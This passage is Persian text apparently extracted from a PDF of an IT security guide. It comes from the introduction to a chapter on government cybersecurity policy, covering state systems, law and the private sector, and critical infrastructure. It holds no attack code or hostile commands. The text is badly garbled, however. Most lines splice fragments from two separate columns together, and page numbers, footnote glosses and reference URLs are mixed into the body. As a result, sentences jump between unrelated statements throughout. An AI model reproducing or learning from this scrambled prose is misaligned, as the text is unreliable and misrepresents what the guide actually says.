‫ﻓﺼﻞ ‪ .۲‬ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﱵ‬
‫ﻓﺼﻞ ‪ .۳‬ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﱵ ﺑﺮ ﲞﺶ ﺧﺼﻮﺻﻲ‬
‫ﻓﺼﻞ ‪ .۴‬ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﱪ ﺩﻭﻟﺖ‬
‫ﺩﺍﺭﻧﺪ‪ ٤.‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻗﺴﻤﺖ ﺍﻋﻈـﻢ ﻣـﺴﺌﻮﻟﻴﺖ ﻛـﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ‬
‫ﺍﻣﻨﻴﺖ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺍﺳﺖ‪ .‬ﻋﻠﻴﺮﻏﻢ‬
‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ‪ ،‬ﻭﺟﻮﺩ ﻭ ﻛﺎﺭﺍﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺑـﺮﺍﻱ ﺭﻓـﺎﻩ‬
‫ﻻ ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﺍﺳﺖ ﻛـﻪ‬ ‫ﻣﻠﻲ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺯ ﺁﻥ ﺍﺳﺘﻘﺒﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻣﻲﺷﻮﺩ ﻭ ﻟﺬﺍ ﺩﻭﻟﺖ ﺑﻪ ﺁﻥ ﺗﻮﺟﻪ ﺯﻳﺎﺩﻱ‬ ‫ﻓﺼﻞ ﺍﻭﻝ‬
‫ﻻ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧـﺎﺹ ﺧـﻮﺩ ﺭﺍ‬ ‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺩﻭﻟﺘﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺩﺍﺭﻧﺪ؛ ﺍﺯ ﺟﻤﻠﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ‪ ،‬ﺧـﺪﻣﺎﺕ‬
‫ﻣﻘﺪﻣﻪ‬
‫ﺍﺿــﻄﺮﺍﺭﻱ‪ ،‬ﺑﻬﺪﺍﺷــﺖ ﻭ ﺳــﺎﻳﺮ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ ﺿــﺮﻭﺭﻱ ﻣــﻮﺭﺩ‬ ‫ﻣﺸﺎﺑﻪ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺮ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺩﺭ ﻣﻘﻮﻟـﻪ ﺍﻣﻨﻴـﺖ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﻏﺎﻟﺒﹰﺎ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺧﺼﻮﺻﻲ‬ ‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻧﻴـﺰ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﻧﻘـﺶ ﻣﻬﻤـﻲ ﺍﻳﻔـﺎ‬
‫ﻭﺍﺑــﺴﺘﻪﺍﻧــﺪ‪ .‬ﺩﺭ ﻣﺠﻤــﻮﻉ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ‬ ‫ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺑﺎﻳﺪ ﺑﺎ ﺍﺣﺘﻴﺎﻁ ﺍﻇﻬﺎﺭ ﻧﻈﺮ ﻛـﺮﺩ‪،‬‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ ﻫﻤـﺎﻥ‬ ‫ﭼﺮﺍﻛﻪ ﻳﻚ ﭼـﺎﺭﭼﻮﺏ ﻋﻤـﻮﻣﻲ ﺳﻴﺎﺳـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻣﻨﻴـﺖ ﺭﺍ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﺷـﺮﻛﺘﻬﺎﻱ‬ ‫ﺗﻘﻮﻳﺖ ﻛﻨﺪ؛ ﺍﻣﺎ ﺍﺷﻜﺎﻻﺗﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﻣﻘﺮﺭﺍﺕ ﻧﺎﺩﺭﺳـﺖ ﺩﻭﻟﺘـﻲ‬
‫ﺧﺼﻮﺻﻲ ﻃﺮﺍﺣﻲ ﻭ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻭ ﻟﺬﺍ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺁﻧﻬـﺎ‬ ‫ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﺑﻴﺶ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﭼﻨﻴﻦ ﻣﻘﺮﺭﺍﺗـﻲ ﺍﺳـﺖ‪ .‬ﻓﻨـﺎﻭﺭﻱ‬
‫ﻳﻜﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﺳﺖ‪.‬‬ ‫ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺳﺎﻳﺒﺮ‪ ١‬ﺟﺪﻳﺪ ﺑـﺎ ﭼﻨـﺎﻥ‬
‫ﺑﻮﺍﺳﻄﺔ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﺩﻻﻳﻞ‪ ،‬ﻣـﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴـﺖ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ‬ ‫ﺳﺮﻋﺘﻲ ﺍﻧﺘﺸﺎﺭ ﻣﻲﻳﺎﺑﻨﺪ ﻛﻪ ﻣﻘﺮﺭﺍﺕ ﺩﻭﻟﺘﻲ ﺑﺮﺍﺣﺘـﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻣﻴﺎﻥ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧـﺼﻮﺻﻲ ﺗﻘـﺴﻴﻢ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬ ‫ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﻮﺍﻧﻌﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺳﺮﻳﻊ ﭘﺎﺳﺨﻬﺎﻱ ﻣﺒﺘﻜﺮﺍﻧـﻪ ﺷـﻮﻧﺪ‪.‬‬
‫ﺍﻭﻟﻮﻳﺖ ﺍﻭﻝ‪ ،‬ﺩﻭﻟﺖ ﻣﺴﺌﻮﻟﻴﺖ "ﺗﻨﻈﻴﻢ ﺍﻣﻮﺭ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ" ﺭﺍ ﺑﺮ‬ ‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻴـﺎﻥ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺗﻘﻨﻴﻨـﻲ ﻭ‬
‫ﻋﻬﺪﻩ ﺩﺍﺭﺩ؛ ﻳﻌﻨﻲ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻱ ﺻﺤﻴﺢ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ‬ ‫ﻏﻴﺮ ﺗﻘﻨﻴﻨﻲ ﻳﻚ ﻧﻘﻄﺔ ﺗﻌﺎﺩﻝ ﭘﻴـﺪﺍ ﻛﻨـﻴﻢ‪ .‬ﺑـﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ‬
‫ﺍﻳﻤﻨﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺑﻜﺎﺭ ﮔﻴﺮﺩ‪ .‬ﺑﻌﻼﻭﻩ ﺍﺯ ﻟﺤﺎﻅ ﺟﻬـﺎﻧﻲ‬ ‫ﭼﻨﻴﻦ ﺗﻌﺎﺩﻟﻲ‪ ،‬ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﺑﺮﺧﻲ ﻭﻳﮋﮔﻴﻬـﺎﻱ ﺫﺍﺗـﻲ ﻭ‬
‫ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺩﻭﻟﺖ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﻣﺠـﺎﺯﺍﺕ ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ﺍﺯ‬ ‫ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺟﻪ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑـﺎ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ‬
‫ﺍﻧﺠــﺎﻡ ﺣﻤــﻼﺕ ﺑــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ‪ ،‬ﻣﺜــﻞ‬ ‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﭘﻴﺸﻴﻦ‪ ،‬ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‪ ٢‬ﻳﻚ ﻓـﻀﺎﻱ ﻏﻴـﺮ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺍﺯ ﻗﺪﺭﺕ ﻗﻮﺍﻧﻴﻦ ﺣﻘﻮﻕ ﻭ ﺟﺰﺍ ﻛﻤﻚ ﺑﮕﻴﺮﺩ‪.‬‬ ‫ﻣﺘﻤﺮﻛﺰ ﺍﺳﺖ‪ .‬ﺑﺨﺸﻲ ﺍﺯ ﻗﺪﺭﺕ ﺍﻳﻨﺘﺮﻧﺖ ﻧﺎﺷﻲ ﺍﺯ ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ‬
‫ﻓﺮﺍﺗﺮ ﺍﺯ ﺁﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺩﻭﻟﺘﻬﺎ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩﺍﻧﺪ ﻛﻪ ﺑـﺮﺍﻱ‬ ‫ﺍﺳﺖ ﻛﻪ ﻓﺎﻗﺪ ﺩﺭﺑﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﻴﺸﺘﺮ ﻛـﺎﺭﺍﻳﻲ ﺁﻥ ﺩﺭ ﻣﺮﺯﻫـﺎﻱ‬
‫ﺍﺭﺗﻘﺎﻱ ﺭﻭﺍﻟﻬﺎﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬ ‫ﺷﺒﻜﻪ ﺍﺳﺖ ﺗﺎ ﺩﺭ ﻣﺮﻛﺰ ﺁﻥ‪ .‬ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ﺑﺎﻳﺪ‬
‫ﺑﺎﻳﺪ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻣﻀﺎﻋﻔﻲ ﺭﺍ ﻣﺘﺤﻤﻞ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺗﻼﺵ ﺑـﺮﺍﻱ‬ ‫ﺍﻳﻦ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻓـﺼﻞ‬
‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﻮﺳﻂ ﺩﻭﻟﺖ ﺍﺗﺨﺎﺫ ﺷـﻮﺩ ﻛـﻪ ﺑﺎﻋـﺚ‬ ‫ﺳﻠﺴﻠﻪ ﮔﺎﻣﻬﺎﻳﻲ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﻭﻟﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻧﺸﻮﻧﺪ ﻗﻮﺍﻧﻴﻦ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﻣﺠـﺎﻝ ﻇﻬـﻮﺭ ﺍﺑﺘﻜـﺎﺭﺍﺕ ﻭ‬ ‫ﺁﻧﻬﺎ ﻭ ﻣﺴﺘﻘﻞ ﺍﺯ ﺗﺼﻤﻴﻤﮕﻴﺮﻳﻬﺎﻱ ﻓﻨﻲ‪ ،‬ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧـﻮﺩ‬
‫‪٣‬‬
‫ﻧﻮﺁﻭﺭﻳﻬﺎ ﺭﺍ ﺑﮕﻴﺮﻧﺪ‪ ،‬ﺑﻠﻜـﻪ ﺩﺭﻋـﻮﺽ ﻣﻨﺠـﺮ ﺑـﻪ ﺣـﺪﺍﻛﺜﺮ ﺷـﺪﻥ‬ ‫ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ‪.‬‬
‫ﻣﺰﺍﻳﺎﻱ ﺩﺧﺎﻟﺖ ﺩﻭﻟﺖ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﮔﺮﺩﻧـﺪ‪ .‬ﺩﺭ ﻳـﻚ ﻓـﻀﺎﻱ‬ ‫ﺑﺎ ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﻛﺸﻮﺭﻱ ﺑﻪ ﻛﺸﻮﺭ ﺩﻳﮕﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ‪،‬‬
‫ﻫﻤﻜﺎﺭﻱ‪ ،‬ﻧﻘﻄﻪ ﺗﻌﺎﺩﻟﻲ ﺑﻪ ﻗﺮﺍﺭ ﺯﻳﺮ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪:‬‬ ‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﻳﻚ ﺟﺰﺀ ﻳﺎ ﺗﻤﺎﻣﻲ ﺍﺟﺰﺍﻱ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﻬﻢ ﻭ ﺣﺴﺎﺱ ﻛـﻪ ﻣﺒﺘﻨـﻲ‬
‫ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻛﺎﺭ ﻛﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺴﻮﻱ ﺍﻣﻨﻴـﺖ‬ ‫•‬
‫ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ )ﺑﺎﻧﻜـﺪﺍﺭﻱ‪ ،‬ﺣﻤـﻞ ﻭ ﻧﻘـﻞ‪ ،‬ﺍﻧـﺮﮊﻱ‪،‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺗﺮﻏﻴﺐ ﻣﻲﻛﻨﺪ ﺗـﺎ ﺳـﻮﺩ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺗﻮﻟﻴﺪ ﻭ ﻏﻴﺮﻩ( ﺗﺤﺖ ﺗﻤﻠـﻚ ﻭ ﻋﻤﻠﻜـﺮﺩ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﻗـﺮﺍﺭ‬
‫ﻛﺴﺐ ﻛﻨﻨﺪ؛‬

‫ﻼ ﺟﺪﻳـﺪ ﺍﺳـﺖ‪ ،‬ﻭ‬ ‫ﺩﺭ ﺑﻌﻀﻲ ﻛﺸﻮﺭﻫﺎ ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﻣﺴﺌﻠﻪﺍﻱ ﻛـﺎﻣ ﹰ‬ ‫‪۴‬‬ ‫‪1‬‬ ‫‪Cyber Threats‬‬
‫ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨـﺎ ﺍﺳـﺖ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ‪ ،‬ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ‪ ،‬ﻭ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ‬ ‫‪2‬‬ ‫‪Cyberspace‬‬
‫ﺩﺭﺣﺎﻟﻴﻜــﻪ ﺑــﺎ ﻃﻴــﻒ ﻛــﺎﻣﻠﻲ ﺍﺯ ﻣــﺸﻜﻼﺕ ﺳــﻨﺘﻲ ﻣــﺮﺗﺒﻂ ﺑــﺎ‬ ‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬ ‫‪۳‬‬
‫ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﺩﺳﺖ ﺑﻪ ﮔﺮﻳﺒﺎﻥ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺘﺎﺯﮔﻲ ﺑﺎ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺖ ﻧﻴﺰ‬ ‫‪http://www.abanet.org/abapubs/books/cybercr‬‬
‫‪ime‬‬
‫ﺩﺳﺖ ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻨﺪ‪.‬‬ ‫‪http://www.isn.ethz.ch/crn‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٣٢‬‬

‫ﺍﻳﻦ ﺑﺨﺶ ﻋﻼﻭﻩ ﺑـﺮ ﺗﻮﺿـﻴﺢ ﻣﻘـﺪﻣﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺸﻮﺭﻫﺎﻱ‬ ‫ﺗﺤﻘﻴﻘﺎﺕ ﺩﻭﻟﺘﻲ ﻭ ﺁﮔﺎﻩﺳﺎﺯﻱ؛‬ ‫•‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‪ ،‬ﺑﻪ ﺷﺮﺡ ﺟﺰﺋﻴﺎﺕ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﻛـﻪ‬ ‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﺒﻜﻪﻫـﺎﻱ‬ ‫•‬
‫ﻣﻄﺎﺑﻖ ﻗﻮﺍﻧﻴﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬ ‫ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﻨﺪ؛‬
‫ﭼﻨﺪﻣﻠﻴﺘﻲ ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ .‬ﻧﻜﺎﺕ ﻣﻄـﺮﺡ ﺷـﺪﻩ ﺑـﺎ ﺩﻗـﺖ‬ ‫ﻣﻔﺎﻫﻴﻢ ﻗﻮﺍﻧﻴﻦ ﺳﻨﺘﻲ ﻛﻪ ﻭﺍﺭﺩ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﺪﻩﺍﻧﺪ؛ ﻭ‬ ‫•‬
‫ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺗﻤﺮﻛﺰ ﺑـﺮ ﻣﻨـﺎﺑﻊ ﻭ‬ ‫ﻗﻮﺍﻧﻴﻦ‪ ،‬ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺑـﺮ‬ ‫•‬
‫ﻣﺪﻟﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﻣﺮﺍﻛﺰ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻧﺒﺎﻳﺪ ﺳـﺎﻳﺮ‬ ‫ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻤﺮﻛﺰ ﻳﺎﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺟﻬﺎﻥ ﺭﺍ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻣﻄﺎﻟﻌـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺭﺩ‬ ‫ﻣﻔﻬﻮﻡ "ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ" ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺟﺰﺋﻲ ﺍﺯ ﻣﻮﺿـﻮﻉ‬
‫ﺑﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻣﻲ ﻛﺸﻮﺭﻫﺎ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪،‬‬
‫‪١٠‬‬
‫ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﺑﻪ ﻧﺎﻡ "ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﺩﺭ ﮔﺴﺘﺮﺵ ﺍﻋﺘﻤﺎﺩ ﺍﻳﻨﺘﺮﻧﺘـﻲ"‬
‫ﭘﻴﺸﺮﻓﺖ ﻧﻤﺎﻳﻨﺪ ﻭ ﭼﺎﺭﭼﻮﺏ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ ‫ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ‪ .‬ﺍﻳﺠﺎﺩ ﻳـﻚ ﻣﺤـﻴﻂ ﻗﺎﺑـﻞ ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺭ ﻓـﻀﺎﻱ‬
‫ﺧﻮﺩ ﺑﺮﮔﺰﻳﻨﻨﺪ‪ .‬ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻭ ﺍﻧـﺴﺎﻧﻲ ﺩﺭ ﺩﺳـﺘﺮﺱ‪ ،‬ﻣﺘﻔـﺎﻭﺕ‬
‫ﺳﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨﺪ ﺗﻄﺒﻴﻖ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺩﺭ ﺳﻄﺢ ﺍﺑﺘﺪﺍﻳﻲ ﺑﺎ ﺍﻳﻦ‬
‫ﺑﺮ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﺯﻣﻴﻨـﻪﻫـﺎ ﺷـﺎﻣﻞ ﺣﻤﺎﻳـﺖ ﺍﺯ‬
‫ﻣﻮﺿﻮﻉ ﺑﺮﺧﻮﺭﺩ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﺻﻮﻝ ﮔﻔﺘـﻪﺷـﺪﻩ ﺩﺭ ﺍﻳﻨﺠـﺎ ﻛـﺎﺭﺑﺮﺩ‬
‫ﻣﺼﺮﻑﻛﻨﻨﺪﻩ‪ ،٥‬ﺧﺼﻮﺻﻲ ﻣﺎﻧﺪﻥ ﺩﺍﺩﻩﻫـﺎ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ ،٦‬ﺣﻘـﻮﻕ‬
‫ﺟﻬﺎﻧﻲ ﺩﺍﺭﺩ‪ .‬ﻫﻤﻴﺸﻪ ﺑﺎﻳﺪ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷـﺖ ﻛـﻪ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻭ‬
‫ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨﻮﻱ‪ ٧‬ﻭ ﭼﺎﺭﭼﻮﺏ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ٨‬ﻣﻲﺑﺎﺷـﺪ‪ .‬ﺩﺭ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﺮﺯﻫﺎﻱ ﻛﺸﻮﺭﻫﺎ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺩﻧﻴــﺎﻱ ﺑــﺪﻭﻥ ﺍﻳﻨﺘﺮﻧــﺖ‪ ،‬ﻗــﺎﻧﻮﻥ ﺑــﺮﺍﻱ ﻣﻌــﺎﻣﻼﺕ ﺗﺠــﺎﺭﻱ ﻭ‬
‫ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺣﻤﺎﻳﺘﻬﺎﻳﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪ .‬ﻗﺴﻤﺖ ﺍﻋﻈـﻢ ﺍﻳـﻦ‬
‫ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ‬
‫ﻗﻮﺍﻧﻴﻦ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴـﺰ ﻗﺎﺑـﻞ ﺍﻋﻤـﺎﻝ ﻫـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ‬
